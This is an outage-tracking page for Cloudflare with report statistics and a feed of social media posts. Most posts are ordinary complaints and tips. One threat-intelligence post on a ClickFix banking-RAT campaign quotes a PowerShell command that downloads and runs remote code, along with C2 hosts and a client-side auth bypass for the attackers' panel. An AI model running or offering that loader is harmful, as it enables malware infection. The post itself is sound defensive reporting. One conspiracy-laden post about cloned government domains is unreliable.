1. Home
  3. Companies
  5. Cloudflare
Cloudflare

Cloudflare status: hosting issues and outage reports

No problems detected

If you are having issues, please submit a report below.

Full Outage Map

Cloudflare is a company that provides DDoS mitigation, content delivery network (CDN) services, security and distributed DNS services. Cloudflare's services sit between the visitor and the Cloudflare user's hosting provider, acting as a reverse proxy for websites.

Problems in the last 24 hours

The graph below depicts the number of Cloudflare reports received over the last 24 hours by time of day. When the number of reports exceeds the baseline, represented by the red line, an outage is determined.

At the moment, we haven't detected any problems at Cloudflare. Are you experiencing issues or an outage? Leave a message in the comments section!

Most Reported Problems

The following are the most recent problems reported by Cloudflare users through our website.

  • 33% Domains (33%)
  • 31% Cloud Services (31%)
  • 19% Hosting (19%)
  • 11% Web Tools (11%)
  • 6% E-mail (6%)

Live Outage Map

The most recent Cloudflare outage reports came from the following cities:

CityProblem TypeReport Time
Angers Cloud Services 10 days ago
London Domains 12 days ago
Noida Hosting 25 days ago
Jewar E-mail 25 days ago
Braga Web Tools 25 days ago
Noida Cloud Services 26 days ago
Full Outage Map

Community Discussion

Tips? Frustrations? Share them here. Useful comments include a description of the problem, city and postal code.

Beware of "support numbers" or "recovery" accounts that might be posted below. Make sure to report and downvote those comments. Avoid posting your personal information.

Cloudflare Issues Reports

Latest outage, problems and issue reports in social media:

  • nhrdev
    nowshad (@nhrdev) reported

    can't imagine the day when it will go down like aws, CloudFlare, google 💀

  • suny_nick
    Nick Sunny (@suny_nick) reported

    @EddCoates I had similar issues. If you use Cloudflare, you can do what I did

  • FardeemM
    Fardeem (@FardeemM) reported

    If you're on your way to building a billion dollar company that involves a web app, here are some of my notes on architecting the frontend. if you don't do this, it's probably fine but one day you'll hire someone to fix it but truly that person could be doing some other higher value thing if you make some key optimizations on day 1 you don't even have to learn anything you're gonna tell your agents to do it anyways! okay here it goes: - Make your server code generate a openapi spec which then generates all the relevant client side code. Never do this by hand. Typing backend types instead of generating them should be banned - You need to make a decision on how the client talks to the backend. rest/graphql works in which case please just use tanstack query. other libraries will look similar but tanstack query truly is goated. - if you want linear style sync setups or offline mode, think about this HARD and architect it from day 1. Bolting this on later is so tedious. - People like using plain react router but things have gotten a lot better since then. Try their new framework mode or just even use tanstack router. Use route data loaders. - If you store a lot of state in query params, make that a first class citizen and make sure its type safe. use nuqs or tanstack query. - Most apps just need a single state management situation for server state and thats it. If you have other bespoke needs, i have quite like zustand and xstate/store. - If you have a super interactive app where things come in and out of view, theres a lot of frontend state to maintain, music is playing and what not, lock in and learn xstate. Trust me if you wanna keep ur sanity, you need to model ur frontend as a state machine otherwise you're gonna be deep in useEffect hell - React compiler is here my friends, the days of useMemo and useCallback are gone. Update your priors accordingly - Tailwind is easy and fun but makes it really hard to maintain a large app with consistent styling. You need a "agent-first design system/component library" but maybe this is a rant for another day - Don't be afraid to hack your routing library to fit your needs more closely. A lot of apps have "drawers" to show additional info. You should 100% be able to say "here's a route, make it a drawer" and everything should be handled from there. - Managing loading and error states using isPending and isError is madness. Lean into Suspense and ErrorBoundary. - Figuring out a blessed path for websockets and SSE on day 1 i think will pay dividends in the long term if you're building anything AI related. - If you're building a SPA, don't use next.js. it literally makes no sense. Why would you do this. - Definitely deploy on Cloudflare or vercel. There are other services but trust, there have weird missing features. - Assuming you build something people want, the next job is to build the factory so it can efficiently build the thing. Act accordingly.

  • ShadeNoah
    ShadeNoah (@ShadeNoah) reported

    @EddCoates Yeah that sucks... Has been an issue forever, though. Nobody gives a **** about robots.txt... No wonder CDNs like Cloudflare pretty much have over half the internet on their servers by now. See if you can rate-limit every request, or bite the bullet and use a CDN. Godspeed, mate.

  • ann1knit
    Ann the cat herder (@ann1knit) reported

    If cloudflare is so buggy and easily broken or hacked, why the frell hasn't someone come up with a better system or solution?

  • DFIR_Radar
    DFIR Radar (@DFIR_Radar) reported

    AI-generated ClickFix lure impersonates a Brazilian 🇧🇷 bank to drop SmartRAT, a PowerShell banking RAT with QR-swap, keylogging, and fake overlay capabilities. The C2 panel had no server-side auth. Key findings: - Full infection chain: typosquatting domain cartaobb[.]com mimics cartaobrb[.]com[.]br, fake Cloudflare CAPTCHA triggers clipboard injection, fake BSOD locks the browser, then victim pastes: powershell "$k8='hxxp://64[.]95[.]13[.]238/st.txt';iex(irm $k8)" into Run. Three-stage PowerShell dropper pulls payload[.]php, AES-CBC decrypts SmartRAT in memory. Hashes: st.txt 297eb45f028d44d750297d2f932b9c91, RAT b17ccdb5531555e43f082d6e77c07227. - SmartRAT (SMART_V25) persists as scheduled task or Windows service named MicrosoftEdgeUpdateCore (T1543.003), copies itself to %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt, logs all activity to C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log and per-PID logs. - C2 at c[.]windowsupdate-cdn[.]com port 51888 (fallback 162[.]141[.]111[.]227), AES-CBC encrypted over raw TCP. QR-swap feature overlays attacker QR at exact pixel coordinates of the legitimate banking QR to redirect transactions. Monitors window titles for santander, bradesco, itau, nubank, binance, and a dozen more. - The C2 panel (branded MyGood PRO) bypasses auth by checking only localStorage values authToken and currentUser client-side with no server validation, exposing the full admin panel to anyone who sets those keys. #DFIR_Radar

  • onurardaoz
    Arda (@onurardaoz) reported

    @Cloudflare Warp ui sucks for macs now. Please turn it back.

  • mattzcarey
    Matt Carey (@mattzcarey) reported

    Day 0 support for MCP servers on Cloudflare, with Workers OAuth Provider. Thanks to our customers for working with us to ship this for the wider ecosystem :) Sounds small but this is massive for MCP auth in large companies.

  • tebayoso
    Jorge (@tebayoso) reported

    I had my @cloudflare bill spin up from 0 to 500 per day, and their interface was broken for two days, when I noticed I had to pay 900usd. They don't respond to customer support :(

  • adrianwjfritz
    Adrian Fritz (@adrianwjfritz) reported

    5/ Governments and major tech companies are already moving. Most blockchains are catching up. The US requires quantum-resistant cryptography on all new national security systems from January 2027 - retiring the same methods Bitcoin, Ethereum, and Solana rely on today. Cloudflare, Apple, Signal, Microsoft, and AWS are already deploying upgrades. 24 of the top 26 blockchain protocols still rely entirely on methods being phased out elsewhere.

  • ergonautgg
    Errrg-XL (@ergonautgg) reported

    @TapTools clearly has zero plans to open source the services they brought to Cardano. What exactly was their problem keeping this site afloat (dont you use Cloudflare?) after receiving hundreds of thousands in treasury/Catalyst funding?

  • jaypopat0
    Jay (@jaypopat0) reported

    @FredKSchott Btw, would Flue support something like "Cloudflare Think"-style cloud agents as well? Curious if there are nice integrations with Cloudflare primitives (Workers, Durable Objects, Queues, etc.) for workflows and the overall agent harness.

  • dukeo
    dukeo (@dukeo) reported

    @EddCoates Had the same issue on one of our sites receiving millions of hits from scrapers while getting just a few thousands legit visitors per day. The only way is to be extremely aggressive in your Cloudflare setup.

  • sulabhpuri
    Sulabh Puri (@sulabhpuri) reported

    A lot of problems with @Cloudflare today.

  • DataDeLaurier
    Data (@DataDeLaurier) reported

    @distributedkv "...and dont require me to use cloudflare or a vpn if i want to self-host also take down the cloud."

  • thinkistillcare
    sw1tch.sh (@thinkistillcare) reported

    suddenly i start getting captchas on google and cloudflare it has to be my IPTV service on my fire stick right?

  • Andrew652263
    Devine dev (@Andrew652263) reported

    @elshad_ff @Teknium Had similar websocket issues before. One thing that helped was testing the same dashboard through Pinggy to confirm if Cloudflare was the bottleneck.

  • starmexxx
    starmex (@starmexxx) reported

    WHY WASTE 16 MINUTES OF YOUR TIME ON THIS AI ENGINEER EUROPE TALK WHEN I CUT THE 5 BEST MOMENTS INTO 4 MINUTES FOR YOU bright data engineer exposed why your ai agent lies about searching the web. cloudflare blocks 20% of web from ai. 60% of chatgpt citations are broken. agents hallucinate instead of saying "i can't" 00:00 - llms are programmed to please. they make things up instead of saying "i can't" 00:42 - cloudflare blocks 20% of web. 60% of chatgpt citations are broken 02:03 - gpt-5 fails all 5 web tasks without proper tools. zero out of five 02:42 - cloudflare labyrinth feeds ai fake data. bigger hallucinations 03:13 - don't parse with llm. build a parser. saves 99% of tokens bookmark this and watch the supercut below

  • Sounsmooth
    Elizabeth (@Sounsmooth) reported

    @FBIPhiladelphia In Georgia they inputted Datalayers to cache and control. They then gather DNS and block the original government domain. They create a clone using Cloudflare London and Amazon. Then they wait 7 days. . . You know why. Then they activate it and viola a compromised Amazon fake government domain using a pre appointed L3 contractor who hired DEI employees are at the wheel with IT who ask the REF NAMED “Raj” Z and Kash’s buddy, who to blame for breaches is the GSA Zone 4 IC3. Kash Patel knows as do the IT volunteers. The China leak biz continues and RICO and bad guys thrive. AMERICANS LOSE. True story.

  • rohit_jsfreaky
    Rohit Kashyap | AI + Full-Stack (@rohit_jsfreaky) reported

    @EddCoates that nginx 500 is the scrapers basically ddosing you for free training data. robots txt is a polite suggestion they ignore now. what actually helps, put cloudflare in front with bot fight mode on, rate limit per asn not per ip since they rotate addresses, and consider a tarpit for the worst offenders. it is not legal so much as unenforceable at their scale, which is the real problem

  • sinasanm
    Sina Meraji (@sinasanm) reported

    totally forgot i can replace the scrappy cf onboarding in kimiflare with the new "login with cloudflare" oauth thingy

  • fraey0
    ƒrαeყ (@fraey0) reported

    it costs about $21/month to run what could become a multi-million dollar startup • human brain = reasoning (free) • claude = coding ($20/mo) • supabase = backend (free) • vercel = deployment (free) • namecheap = domain ($12/yr) • stripe = payments (2.9%/trx) • github = versioning (free) • resend = email (free) • clerk = auth (free) • cloudflare = DNS (free) • posthog = analytics (free) • sentry = error tracking (free) • upstash = redis (free) • pinecone = vector DB (free) everything sums up to roughly $20 to $25 per month so, the tools are not the barrier anymore. most ideas don’t fail because they’re expensive to build. they fail because they never get built at all. what’s stopping you?

  • OttoLorner
    Otto Lorner (@OttoLorner) reported

    Best OpenClaw use case is making it an admin in AWS, Google Cloud, Cloudflare, wherever and never having to use their horrendous UIs again. Cloud consultant on tap.

  • fataloops
    oops (@fataloops) reported

    @EddCoates I have a (conspiracy) theory about this- Cloudflare is the one doing the scraping, millions of requests Your only option is to use cloudflare or take down the site

  • JDoh2983
    JD'oh (@JDoh2983) reported

    Why Crest Fundgrove and this setup are fake Classic 'fake' pattern: "AI trading bot" with impossible claims (e.g., 85%+ accuracy, easy passive profits, minimal effort). Real markets don't work this way consistently. Minimum deposit around $250 (common in these scams). They often show fake profits in your "account" to encourage more deposits, then make withdrawals difficult or impossible (claiming fees, taxes, or needing more money to "unlock"). No real regulation: Reviews couldn't verify proper licensing with Canadian regulators (IIROC/CSA). Legitimate platforms targeting Canadians are transparent about this. Fake testimonials and reviews: Their own site has glowing "verified" reviews with inconsistent numbers. YouTube "reviews" are mostly affiliate promo videos (they earn commissions on deposits/signups). Related 'fake' service reports: Similar names (e.g., Crest Maverick Broker) have Reddit complaints about fake profits followed by withdrawal blocks or demands for more money. The weird domain + tracking params: Legitimate financial companies do not use domains like "hetouchesitdies dot com" or heavy affiliate cloaking like this. This is infrastructure for running mass scam ads. The Cloudflare content you may have seen on the page is likely because these 'fake' operations often use Cloudflare for hosting/CDN/protection (or content cloaking). It doesn't make it legitimate.

  • dump_tcp
    tcpdump (@dump_tcp) reported

    @EddCoates if need any help with cloudflare I can help with some rules also it seems you're webserver code is bottlenecking you causing that error usually due to not being able to handle that many connections or to much cpu usage the webserver process dies i suggest using #golang best lang

  • alishteinn
    Aly (@alishteinn) reported

    Most Next.js websites are entirely too slow. I just boosted the Cursor Baku community site performance from 77 to 98. It is deployed on @Cloudflare, and the fixes were incredibly simple. If you want lightning-fast load times, steal these 4 tips: • Resize images to their actual display size before committing • Set minimumCacheTTL in next.config to cache image at the edge • Always set sizes on Next.js <Image> or retina fetches 4× the bytes • Wrap R2 reads with caches.default to serve media from the edge Fast load times build trust. Stop losing users over a slow website.

  • atresnjo1
    Adnan (@atresnjo1) reported

    if @Cloudflare services had a strict spending limit i'd use them for everything tbh, just too afraid to vibecode some side **** and wake up to a $5k bill

  • AutismCapital
    Autism Capital 🧩 (@AutismCapital) reported

    @jdoliner Sorry, can't do your scan today, Cloudflare is down.

  • 0xfa7b
    Ahmed Aldeab (@0xfa7b) reported

    Stopping the bad guys with Cloudflare: 885 malicious requests blocked or challenged in the last month #cloudflare